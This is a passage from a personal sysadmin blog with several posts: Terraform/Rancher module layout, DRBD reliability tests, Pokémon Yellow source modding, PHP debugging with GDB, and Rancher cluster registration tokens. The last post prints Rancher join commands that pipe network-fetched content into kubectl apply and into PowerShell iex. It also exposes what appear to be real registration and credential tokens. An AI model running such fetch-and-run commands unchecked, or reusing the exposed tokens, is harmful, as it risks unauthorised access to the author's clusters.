  token_key = rancher2_bootstrap.admin.token
  insecure = true
}

All Rancher.tf config

The rancher.tf is one of the big terraform files. Here we'll use the Rancher provider. Here we define:

The Helm installation of Rancher
Where the Rancher cluster will be
A bootstrap provider for Rancher
An admin provider for Rancher

If you have set up the security groups open wide, you should choose a unique, strong password for the initial Rancher Helm deployment.

We override the Rancher version to get the latest patches, as this is not the default.

Using the alias attribute, we can make multiple providers. This way, we separate admin from bootstrap.

Once we run terraform apply, we'll see the Rancher server creating.

We can access the generated password by running:

terraform show -json \
  | jq '.values["root_module"]["resources"][] \
  | select(.address == "rancher2_bootstrap.admin") | .values.password' -r

Using JSON to extract password

But we can also ask Terraform to write it down:

resource "local_sensitive_file" "rancher-password" {
  content = rancher2_bootstrap.admin.password
  filename = "rancher_password"
}

Write password to sensitive file

Unforeseen dependency problems

To test this script, we can now run terraform destroy and terraform apply. It will immediately tell you that kubeconfig.yaml does not exist. The missing file happens due to Terraform not having initialized the cluster yet. Expanding your Terraform module step by step can cause unwanted dependency orders. Helm needs the kubeconfig file, while it's only created after the Helm provider is initialized. There is a lot more on this subject written in this GitHub issue.

To fix this problem, I've moved a lot of things around. I made three directories:

Cloud
RKE
Rancher

I've moved everything CloudStack related to Cloud and so forth.

.
├── cloud
│   ├── instances.tf
│   ├── main.tf
│   └── security_groups.tf
├── rancher
│   ├── certmanager.tf
│   ├── main.tf
│   └── rancher.tf
├── rke
│   ├── main.tf
│   ├── rke.tf
│   └── rke_debug.log
├── test_rsa
└── test_rsa.pub

Directory tree

Breaking apart the monolith

Having everything in one Terraform configuration causes dependency troubles. Besides that, you can't split privileges to a certain level of your infrastructure that way. Some people could manage CloudStack, some RKE and Rancher. Breaking the config into small pieces that only do what they're supposed to will create more flexibility. It looks a lot cleaner too.

Cloud

I've changed the main.tf and moved the RKE and Rancher provider stuff to the main.tf of those respective directories. Another change is having Cloud write an output after each run to export the IP address to the others.

output "ip_address" {
  value = cloudstack_instance.test.ip_address
}

Output info of Terraform run and save in terraform.state

I've also changed all pointers to test_rsa to point to ../test_rsa.

RKE

RKE now has to know what Cloud's data output was. To do this, we've got to add this small config to the main.tf of RKE and make it aware of Cloud's data.

data "terraform_remote_state" "cloud" {
  backend = "local" 
  config = {
    path    = "../cloud/terraform.tfstate"
  }
}

Read output data from remote terraform.state

Change the cloudstack_instance.test.ip_address to data.terraform_remote_state.cloud.outputs.ip_address in rke.tf.

Change the test_rsa path to ../test_rsa. You should do the same with the pub file.

Rancher

The only change needed here is to point to the correct location of kubeconfig.yaml which is ../rke/kubeconfig.yaml.

Testing it again

To test the complete module, we should enter the cloud directory first. Apply and move on to the next directory, RKE. Once RKE is set up, move to the Rancher directory and apply again.

Conclusion

With the installation of Rancher, we've come to the end of this blog post. The following blog post will be about provisioning multiple servers config efficiently and growing the Rancher instance. We'll also add an extra cluster to the Rancher instance.

Using custom providers in Terraform

marco — Fri, 18 Mar 2022 07:10:39 GMT

The RKE provider that I'd like to use is some versions behind. It seemed easy enough to update the dependency, but I struggled to get this custom RKE provider working without having to upload it somewhere. The documentation didn't seem to be obvious enough. After searching on Google, I found this issue on GitHub, which made it clear.

For me, the example meant:

# main.tf

terraform {
  required_providers {
    rke = {
      source = "my.local/marco/rke"
      version = "1.3.1"
    }
  }
}

Terraform providers

~/.terraform.d/plugins/my.local/marco/rke/1.3.1/linux_amd64/terraform-provider-rke_v1.3.1

Directory structure from home

Reliability DRBD

marco — Mon, 28 Feb 2022 15:05:51 GMT

In my last post, I showed that DRBD could be used diskless, which effectively does the same as exposing a disk with iSCSI. However, DRBD can do more than just become an iSCSI target, and its most known feature is replicating disks over a network.

This post will look into mounting a DRBD device diskless and testing its reliability when one of the two backing nodes fails and more.

I started by mounting the DRBD disk on node 3, the diskless node. If you run drbdadm status it should show the following:

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

drbdadm status

After it's mounted, I've created a small test file and installed pv. I started writing the test file slowly to the disk. For now, we don't want to overload the disk or fill it up too quickly to perform reliability tests.

I gave node one a shutdown command to test the reliability under normal circumstances. After it came back, I gave node two a shutdown command.

# Diskless DRBD node 3

root@drbd3:~# dd if=/dev/urandom bs=1M count=1 > /testfile
root@drbd3:~# cat /testfile | pv -L 40000 -r -p -e -s 1M > /mnt/testfile
[39.3KiB/s] [=====>                          ] 11% ETA 0:00:23

# DRBD node 1

root@drbd1:~# reboot
Connection to 192.168.178.199 closed by remote host.
Connection to 192.168.178.199 closed.

# DRBD node 2

root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd1 connection:Connecting
  drbd3 role:Primary
    peer-disk:Diskless

# DRBD node 1

root@drbd1:~# drbdadm adjust all
Marked additional 4096 KB as out-of-sync based on AL.
root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile && md5sum /mnt/testfile
553118a49cea22b739c2cf43fa53ae86  /testfile
553118a49cea22b739c2cf43fa53ae86  /mnt/testfile

Testing reliability with graceful reboots

During the reboot of DRBD node one, the writes on DRBD node three were halted shortly but came back very soon after.

When applying more pressure on the disks using a 3GB test file and unlimited speed, the disk of the rebooted server became inconsistent and needed a resync.

root@drbd2:~# reboot
Connection to 192.168.178.103 closed by remote host.
Connection to 192.168.178.103 closed.
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:7.28
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency
    
# Diskless DRBD node 3

root@drbd3:~# md5sum /testfile && md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile && md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile
root@drbd3:~# md5sum /testfile && md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
d67f12594b8f29c77fc37a1d81f6f981  /mnt/testfile

Same test but with 3GB file at 500MBps write speed.

So DRBD seems to be very stable when the servers are rebooted gracefully. But what happens if we reboot them both?

root@drbd3:~# cat /testfile | pv -r -p -e -s 3000M > /mnt/testfile; md5sum /testfile && md5sum /mnt/testfile
[3.67MiB/s] [=======================================>                                                                         ] 36% ETA 0:00:22
pv: write failed: Read-only file system

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.824570] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.825393] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826171] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.826876] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.827601] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.828365] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)

Message from syslogd@drbd3 at Feb 28 13:50:38 ...
 kernel:[ 4498.829102] EXT4-fs (drbd1): failed to convert unwritten extents to written extents -- potential data loss!  (inode 12, error -30)
d67f12594b8f29c77fc37a1d81f6f981  /testfile
md5sum: /mnt/testfile: Input/output error
root@drbd3:~# md5sum /testfile && md5sum /mnt/testfile
d67f12594b8f29c77fc37a1d81f6f981  /testfile
2f80ddfb7fe21b9294b2e3663c0a0644  /mnt/testfile
root@drbd3:~# mount | grep mnt
/dev/drbd1 on /mnt type ext4 (ro,relatime)

Testing both persistent disk reboots at the same time

It doesn't like that. But the disk seems to be OK to the point where it could write. Of course, you don't want this to happen, but at least the disks are still mountable and readable.

What if the network starts flapping?

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
  drbd3 role:Primary
    peer-disk:Diskless

... Connectivity failure due to tagging VM with wrong VLAN in Hyper-V

... Restoring VLAN settings

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 connection:Connecting
  drbd3 connection:Connecting

root@drbd1:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd2 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:5.39
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency

Interrupting network connectivity

Writing to the disk was just as fast as writing when both were available.

What if we have a broken network connection that allows 10Mbps?

Normal speed

Hyper-V setting

New speed

However, this only seems to work on outgoing traffic, not incoming traffic. While reading from the disk, both nodes are limited at 10Mbps if one of them is.

Above DRBD node 1, limited at 10Mbps. Below DRBD node 2, unlimited

When setting the DRBD "test-disk" down on node 1, the speed of node 2 became unlimited again.

After "drbdadm down test-disk."

Interesting to see it balances the reads on both nodes.

What if a node gets panicked during writes?

Let's reset DRBD node two while writing at full speed.

root@drbd2:~# packet_write_wait: Connection to 192.168.178.103 port 22: Broken pipe
root@DESKTOP-2RFLM66:~# ssh 192.168.178.103
Last login: Mon Feb 28 14:32:18 2022 from 192.168.178.47
root@drbd2:~# drbdadm status
# No currently configured DRBD found.
root@drbd2:~# drbdadm adjust all
Marked additional 4948 MB as out-of-sync based on AL.
root@drbd2:~# drbdadm status
test-disk role:Secondary
  disk:Inconsistent
  drbd1 role:Secondary
    replication:SyncTarget peer-disk:UpToDate done:0.21
  drbd3 role:Primary
    peer-disk:Diskless resync-suspended:dependency

Reset node two

Besides a short hiccup, we don't notice anything after DRBD declares node two unavailable.

Conclusion

DRBD has shown to be very stable. Rebooting or resetting DRBD nodes will result in a short hiccup but will continue to work just fine. I couldn't yet figure out why limiting one node its network bandwidth results in both nodes being limited in read-speed, and I'd like to see that being balanced based on the congestion of the network. In the next DRBD post, I hope to look at LINSTOR.

Diskless DRBD

marco — Wed, 23 Feb 2022 22:40:58 GMT

I've been using DRBD for quite some time now. When I started as a Linux system administrator at my first real job, DRBD was this RAID1 high available storage thing that was magic to me. In combination with PiranHA, which retired ten years ago, I built a setup I demonstrated to my colleague as a high availability setup.

Although this was ten years ago, the people at LINBIT haven't been sitting still. DRBD 9 came to life in 2015, but I had never had any experience with its new features other than "Just using it". When I started looking into Kubernetes, I started looking deeper in DRBD.

If you've used DRBD 9, you probably know it can, contrary to DRBD 8, replicate to more than two nodes. Replication means you can use DRBD in a cluster of 3 nodes and not decide which two nodes can run which workload. The downside of this is the increased disk usage, and an even more significant problem is the scalability and flexibility problems when you're reaching ten or even 100 nodes. You're not going to replicate all the data over all the 100 nodes.

Flexibility is where diskless DRBD comes in. Once you've installed DRBD on every node of your cluster, your disks aren't bound to the metal casing they reside in. You can expose a single disk on one node to another without replicating the data. Let's dive into the technical stuff now!

Installing virtual machines is manually boring. Use Hyper-V on your Windows workstation to quickly get some virtual machines up and running. Soon I'll talk about doing the same thing with Terraform on AWS, Azure and GCP!

Manual labour! :(

So I've set up three virtual machines with ubuntu 20.04. I did the first things first. I placed my keys on the server and updated them to the latest packages. Make a snapshot; it saves you time.

Something I wanted to do differently in this blog is compiling DRBD myself. Usually, I would use the LINBIT PPA repo, and of course, you can do so. However, time will pass, this post gets old, versions change, and its accuracy will rot.

Let's prepare the servers for DRBD! The commands used to compile are so simple.

# DRBD Kernel Module

sudo apt install build-essential flex
wget https://pkg.linbit.com/downloads/drbd/9/drbd-9.2.0-rc.4.tar.gz
tar zxvf drbd-9.2.0-rc.4.tar.gz
cd drbd-9.2.0-rc.4/
make -j 8
sudo make install
cd - # return to previous directory

# DRBD Utils

wget https://pkg.linbit.com/downloads/drbd/utils/drbd-utils-9.20.2.tar.gz
tar zxvf drbd-utils-9.20.2.tar.gz
cd drbd-utils-9.20.2
./configure --with-manual=no --with-pacemaker=no --with-xen=no --without-83support --without-84support --with-heartbeat=no --prefix=/opt/drbd
make -j 8
sudo make install

# Copy multipathd file to prevent it from locking the drbd disk once it's open

mkdir /etc/multipath/conf.d
cp /opt/drbd/etc/multipath/conf.d/drbd.conf /etc/multipath/conf.d/drbd.conf
systemctl restart multipathd

# Verify it's working

sudo modprobe drbd
cat /proc/drbd

# version: 9.2.0-rc.4 (api:2/proto:110-121)
# GIT-hash: 5828124e330af6238cec2bf396145b4e04487c5f build by feax@drdb1, 2022-02-22 20:55:11
# Transports (api:18): tcp (9.2.0-rc.4)

Compiling the DRBD tools

Do this on all three nodes. DRBD should be running, but nothing to be created yet. First, let's create two persistent disks. You can do diskless with even a single node, but let's test the availability if one of them fails in the next blog post.

feax@drbd1:~$ sudo lvcreate -L 5G -n test-disk ubuntu-vg
[sudo] password for feax:
  Logical volume "test-disk" created.

Creating LV device

Create a DRBD resource file on all three nodes.

root@drbd1:/opt/drbd/etc/drbd.d# cat test-disk.res
resource test-disk {
  device      minor 1;
  disk        /dev/ubuntu-vg/test-disk;
  meta-disk   internal;

  on drbd1 {
    address   192.168.178.199:7100;
    node-id   1;
  }
  on drbd2 {
    address   192.168.178.103:7100;
    node-id   2;
  }
  on drbd3 {
    disk      none;
    address   192.168.178.119:7100;
    node-id   3;
  }

  connection-mesh {
        hosts drbd1 drbd2 drbd3;
  }
}

DRBD resource config

Prepare the persistent disks on both nodes with disks.

feax@drbd1:~$ sudo drbdadm create-md test-disk
  --==  Thank you for participating in the global usage survey  ==--
The server's response is:
    you are the 17th user to install this version
initializing activity log
initializing bitmap (160 KB) to all zero
Writing meta data...
New drbd meta data block successfully created.
success
feax@drbd1:~$ sudo drbdsetup new-current-uuid --clear-bitmap test-disk

Prepare DRBD disks

Adjust the DRBD resources on all nodes and check their status.

feax@drbd1:~$ sudo drbdadm status
test-disk role:Secondary
  disk:UpToDate
  drbd2 role:Secondary
    replication:SyncSource peer-disk:Inconsistent done:14.59
  drbd3 role:Secondary
    peer-disk:Diskless

DRBD status after set up

You'll see that one node says Secondary/Diskless. Let's make this disk primary, create a filesystem and mount it.

feax@drbd3:~$ sudo drbdadm primary test-disk
feax@drbd3:~$ sudo drbdadm status
test-disk role:Primary
  disk:Diskless
  drbd1 role:Secondary
    peer-disk:UpToDate
  drbd2 role:Secondary
    peer-disk:UpToDate
feax@drbd3:~$ sudo drbdadm primary test-disk
feax@drbd3:~$ sudo mkfs.ext4 /dev/drbd1
mke2fs 1.45.5 (07-Jan-2020)
Discarding device blocks: done
Creating filesystem with 1310671 4k blocks and 327680 inodes
Filesystem UUID: ece9ddae-a57c-498e-bccf-251adecf85d2
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736

Allocating group tables: done
Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

feax@drbd3:~$ sudo mount /dev/drbd/by-res/test-disk/0 /mnt
feax@drbd3:~$ ls /mnt
lost+found

Preparing a filesystem

Now we can write files to this filesystem without having the disk available here. Let's dive into the reliability of node failures in the next blog post.

Hacking friends in Pokemon Yellow

marco — Sun, 20 Feb 2022 22:30:42 GMT

Some months ago, the source code of a game I and many others played as a kid was leaked. The game is written in assembly, and people have already reverse-engineered the original game. Still, I was very curious about the original comments in these source files.

After reading some source files, I started figuring out how to compile it. Luckily, people online have already figured it out and posted this online. After compiling and verifying it ran in an emulator, I decided it was time to edit some assembly to allow changes I wished I always had.

One of the things I never liked while replaying the game was how the messages appeared on the screen. The typewriter-style animation takes too much time to show, even when setting it to "fast".

"Fast" typewriter-style message

I've edited the delay out. A simple change, but nice to have.

Non-typewriter-style message

Another thing that bugged me had always been the extreme amount of wild pokemon that appear. So I programmed an extra menu option to activate a max repel on demand.

Repel changing in menu showing the memory table in the back

Sadly, I don't have the changed code anymore. I have the compiled binary, which should be reversely engineerable, but it wouldn't be worth the time.

Another fantastic journey was adding friends to the game. Replacing Pokémon was something I couldn't figure out online. The editing of the strings was the easy part, but adding the images took it to a whole other level. Images in Pokémon Yellow only use four colours: black, white, colour one shade one and colour one shade two. With the help of photoshop greyscale bitmap inverted images, my friends came alive in the game I loved.

0:00

Adding a friend to the game

That's it for this journey. I wished I still had the changed assembly parts to share, but sadly I've lost all of it due to data loss shortly after writing the extended version of this blog post.

Finding (performance) issues in PHP using GDB

marco — Thu, 10 Feb 2022 21:42:55 GMT

Has it ever happened to you when a specific web request keeps loading and loading? Can't figure out where the code is crashing into a segfault? Say no more. You can use a tool called GDB for various complex things. It's a debugger for binary applications which can do a lot more, and we're just going to scratch the surface in one specific way. A way that unveils the exact functions, lines and parameters it's running.

When a web request caused PHP to segfault, I figured I could ask the kernel to make a core dump and read the backtrace whenever this happens.

Let's set up an environment to test core dumping on segfaults.

FROM ubuntu:20.04

RUN apt-get update && \
    apt-get install nano gdb ubuntu-dbgsym-keyring php-cli -y

RUN  printf "deb http://ddebs.ubuntu.com focal main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-updates main restricted universe multiverse\ndeb http://ddebs.ubuntu.com focal-proposed main restricted universe multiverse" > /etc/apt/sources.list.d/ddebs.list

RUN apt-get update && \
    apt-get install libargon2-1-dbgsym libc6-dbg libgcc-s1-dbgsym libicu66-dbgsym liblzma5-dbgsym libpcre2-8-0-dbgsym libsodium23-dbgsym libssl1.1-dbgsym libstdc++6-dbgsym libxml2-dbgsym php7.4-cli-dbgsym zlib1g-dbgsym nano -y

Dockerfile for testing env

Start it up.

root@pc:~# docker build . -t coredumps:latest
...
root@pc:~# mkdir /coredumps
root@pc:~# docker run \
  --rm -it \
  --ulimit core=-1 \
  -v /coredumps:/coredumps \
  coredumps:latest
root@ee967362b789:/# cd

Running a container with core dumps enabled.

Now create a PHP script where a loop will trigger the segfault.

Segfaulting PHP code (Inspired by jolicode)

Run it, and you'll see a segfault:

root@ee967362b789:/# php index.php
Segmentation fault

Segfaulting

Now let's make it dump its core! For the container to make a core dump, you'll need to change the host, and it'll also save the core dump on the host. Be sure to check if you started the container with --ulimit core=-1.

root@pc:~# echo '/coredumps/core.%e.%p' > /proc/sys/kernel/core_pattern

Enabling and sending core dumps to a directory

When rerunning the PHP code, the output has changed.

root@ee967362b789:~# php crash.php
Segmentation fault (core dumped)
root@ee967362b789:/# ls /coredumps/
core.php.13

Creating a core dump

Let's load it up in GDB!

root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) bt
#0  zend_call_method (object=0x7f64cef39770, obj_ce=, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238, function_name=function_name@entry=0x555c2e7922ba "__tostring",
    function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a45100, param_count=0, arg1=0x0, arg2=0x0) at ./Zend/zend_interfaces.c:103
#1  0x0000555c2e6e02cd in zend_std_cast_object_tostring (readobj=, writeobj=0x7ffd05a45150, type=) at ./Zend/zend_object_handlers.c:1799
#2  0x0000555c2e6a54fe in __zval_get_string_func (try=0 '\000', op=0x7f64cef39770) at ./Zend/zend_operators.c:895
#3  zval_get_string_func (op=) at ./Zend/zend_operators.c:925
#4  0x0000555c2e6a592d in concat_function (result=0x7f64cef39780, op1=, op2=op2@entry=0x7f64cef39770) at ./Zend/zend_operators.c:1852
#5  0x0000555c2e6f4e62 in ZEND_CONCAT_SPEC_CONST_TMPVAR_HANDLER () at ./Zend/zend_vm_execute.h:7480
#6  0x0000555c2e72fa7f in execute_ex (ex=0x7ffd05a45030) at ./Zend/zend_vm_execute.h:54491
#7  0x0000555c2e69f75f in zend_call_function (fci=fci@entry=0x7ffd05a45400, fci_cache=0x7f64cee8d0c0, fci_cache@entry=0x7ffd05a453e0) at ./Zend/zend_execute_API.c:812
#8  0x0000555c2e6ca66c in zend_call_method (object=0x7f64cef39700, obj_ce=, obj_ce@entry=0x7f64cee03100, fn_proxy=fn_proxy@entry=0x7f64cee03238,
    function_name=function_name@entry=0x555c2e7922ba "__tostring", function_name_len=function_name_len@entry=10, retval_ptr=retval_ptr@entry=0x7ffd05a454d0, param_count=0, arg1=0x0, arg2=0x0)
    at ./Zend/zend_interfaces.c:103

Backtrace of the PHP process

Right now, it's hard to make sense of this backtrace. Let's load up the gdb init file from the PHP people, making it a lot more readable. (grab it from here)

root@ee967362b789:/# nano ~/.gdbinit
root@ee967362b789:/# gdb php /coredumps/core.php.13
....
....
(gdb) zbacktrace
[0x7f64cef39720] TestMe->__tostring() /crash.php:9
[0x7ffd05a45340] ???
[0x7f64cef396b0] TestMe->__tostring() /crash.php:9
[0x7ffd05a45710] ???
[0x7f64cef39640] TestMe->__tostring() /crash.php:9
...
... Goes brrrr
...
[0x7f64cee131c0] TestMe->__tostring() /crash.php:9
[0x7ffd0623ecc0] ???
[0x7f64cee13140] jump() /crash.php:18
[0x7f64cee130e0] it() /crash.php:14
[0x7f64cee13080] make() /crash.php:4
[0x7f64cee13020] (main) /crash.php:21

gdb init file from PHP

That's more like it. Now we can see it's crashing on line 9 of the PHP file we created. We can also directly jump into GDB to overcome the need for a core dump file.

root@ee967362b789:/# gdb --args php crash.php
...
...
(gdb) run
Starting program: /usr/bin/php crash.php
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000560043641265 in zend_call_function (fci=fci@entry=0x7ffc0d9c80f0, fci_cache=fci_cache@entry=0x7ffc0d9c80d0) at ./Zend/zend_execute_API.c:677
677     ./Zend/zend_execute_API.c: No such file or directory.
(gdb) zbacktrace
[0x7f39071398e0] TestMe->__tostring() /crash.php:9
[0x7ffc0d9c8400] ???
[0x7f3907139870] TestMe->__tostring() /crash.php:9
[0x7ffc0d9c87d0] ???
[0x7f3907139800] TestMe->__tostring() /crash.php:9
...
... Goes brrrr again
...
[0x7f39071396b0] TestMe->__tostring() /crash.php:9
[0x7ffc0e1c2cc0] ???
[0x7f3907013140] jump() /crash.php:18
[0x7f39070130e0] it() /crash.php:14
[0x7f3907013080] make() /crash.php:4
[0x7f3907013020] (main) /crash.php:21

Directly run in GDB

If there is a need for $_SERVER variables, then add the following wrapper script:

#!/bin/bash

export REQUEST_URI=/myuri
export SERVER_NAME=www.example.com
export HTTP_HOST=www.example.com
export DOCUMENT_ROOT=/
export DOCUMENT_URI=/myuri
export SCRIPT_NAME=/myuri
export REQUEST_METHOD=GET
export HTTP_X_FORWARDED_PROTO=https
export REQUEST_SCHEME=https

gdb --args php crash.php

Fake CGI request

If the process is already running, you can use gcore to dump the core and check what it was doing.

root@ee967362b789:/# php crash.php &
[1] 55
root@ee967362b789:/# ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4248  3576 pts/0    Ss   20:52   0:00 bash
root        37  0.3  0.0   4248  3344 pts/1    Ss   21:18   0:00 /bin/bash
root        45  0.0  0.0   5900  2904 pts/1    R+   21:18   0:00 ps aux
root        55  0.0  0.0  58940 17076 pts/0    S+   21:17   0:00 php crash.php
root@ee967362b789:/# gcore 55
...
Saved corefile core.55
[Inferior 1 (process 55) detached]
root@ee967362b789:/# gdb php ./core.55
...
...
(gdb) zbacktrace
[0x7f14d7c130f0] sleep(60) [internal function]
[0x7f14d7c13080] make() /crash.php:4
[0x7f14d7c13020] (main) /crash.php:22
root@ee967362b789:/# cat -n crash.php
     1

GDB with gcore dumps

We can see it's currently sleeping on line 4 of the PHP file.



Refreshing the Rancher cluster registration token
marco — Sat, 22 Jan 2022 17:14:36 GMT
There may be a time when you'll want to refresh the "clusterregistrationtoken" or CRT for short. You can't do this in Rancher, as far as I know.
First, let's see where this token is saved.
marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h
CRT's without extra cluster 
Only the local cluster token is available right now.
apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  creationTimestamp: "2022-01-15T20:33:33Z"
  generation: 3
  name: default-token
  namespace: local
  resourceVersion: "6746"
  uid: 6b444468-6fd1-44a0-b862-331056a88c4d
spec:
  clusterName: local
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/xxxxx_local.yaml
    | kubectl apply -f -
  insecureNodeCommand: ""
  insecureWindowsNodeCommand: ""
  manifestUrl: https://rancher.fe.ax/v3/import/xxxxx_local.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token xxxxxxx
    --ca-checksum xxxxxxx
  token: xxxxxxx
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command "& {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token xxxxxxx --ca-checksum xxxxxxx
    | iex}"
CRT of local
Let's add another cluster. Once we complete the custom cluster creation wizard in Rancher's cluster management, we can see a new namespace created with a unique cluster-ID.
marco@cp1:~$ kubectl get ns
NAME                                     STATUS   AGE
local                                    Active   6d16h
p-rghcj                                  Active   6d16h
cattle-global-data                       Active   6d16h
p-k5j5m                                  Active   6d16h
kube-node-lease                          Active   6d17h
fleet-default                            Active   6d16h
default                                  Active   6d17h
kube-public                              Active   6d17h
cattle-impersonation-system              Active   6d16h
cattle-system                            Active   6d16h
cert-manager                             Active   6d16h
kube-system                              Active   6d17h
cattle-global-nt                         Active   6d16h
cattle-fleet-system                      Active   6d16h
cattle-fleet-clusters-system             Active   6d16h
fleet-local                              Active   6d16h
cluster-fleet-local-local-1a3d67d0a899   Active   6d16h
cattle-fleet-local-system                Active   6d16h
user-zd4f7                               Active   6d16h
c-75snr                                  Active   43m
p-skphs                                  Active   43m
p-phkbr                                  Active   43m
List of namespaces
Here we're checking out the CRT's after cluster creation.
marco@cp1:~$ kubectl get clusterregistrationtoken.management.cattle.io -A
NAMESPACE   NAME            AGE
local       default-token   6d16h
c-75snr     default-token   46m
c-75snr     crt-zztbw       46m
CRT list after cluster creation
We can get the join command from crt-zztbw. Why it's creating a separate token is unknown to me. 
apiVersion: management.cattle.io/v3
kind: ClusterRegistrationToken
metadata:
  annotations:
    field.cattle.io/creatorId: user-zd4f7
  creationTimestamp: "2022-01-22T12:32:57Z"
  generateName: crt-
  generation: 2
  labels:
    cattle.io/creator: norman
  name: crt-zztbw
  namespace: c-75snr
  resourceVersion: "1753365"
  uid: d8bee26d-4f62-4743-90e2-4cce25f745f2
spec:
  clusterName: c-75snr
status:
  command: kubectl apply -f https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  insecureCommand: curl --insecure -sfL https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
    | kubectl apply -f -
  insecureNodeCommand: ""
  insecureWindowsNodeCommand: ""
  manifestUrl: https://rancher.fe.ax/v3/import/jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2_c-75snr.yaml
  nodeCommand: sudo docker run -d --privileged --restart=unless-stopped --net=host
    -v /etc/kubernetes:/etc/kubernetes -v /var/run:/var/run  rancher/rancher-agent:576d32a06
    --server https://rancher.fe.ax --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
    --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
  token: jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2
  windowsNodeCommand: PowerShell -NoLogo -NonInteractive -Command "& {docker run -v
    c:\:c:\host rancher/rancher-agent:576d32a06 bootstrap --server https://rancher.fe.ax
    --token jml8xtf7pwp8k2njknl7ctchz2r4glkn79bqbqdmvgt428ts7s2pb2 --ca-checksum f37e412eaa6ed8f643af2cddeef25790eee501a6ec6b8578309059dd07f3ca37
    | iex}"
The new cluster registration token
Let Rancher provision the cluster for a while.
Cluster provisioning
After the cluster is provisioned, you can check the secrets for cattle credentials in the new cluster.
apiVersion: v1
data:
  namespace: Yy03NXNucg==
  token: cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3
  url: aHR0cHM6Ly9yYW5jaGVyLmZlLmF4
kind: Secret
metadata:
  annotations:
    field.cattle.io/projectId: c-75snr:p-phkbr
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","data":{"namespace":"Yy03NXNucg==","token":"cWpyZHE1OWQ3OGdtYnpscXA1dmt2enRjbnB0cm00ZDc4cjdxc3hycjl3dzVkOGxybHg4eHB3","url":"aHR0cHM6Ly9yYW5jaGVyLmZlLmF4"},"kind":"Secret","metadata":{"annotations":{},"name":"cattle-credentials-f945d4e","namespace":"cattle-system"},"type":"Opaque"}
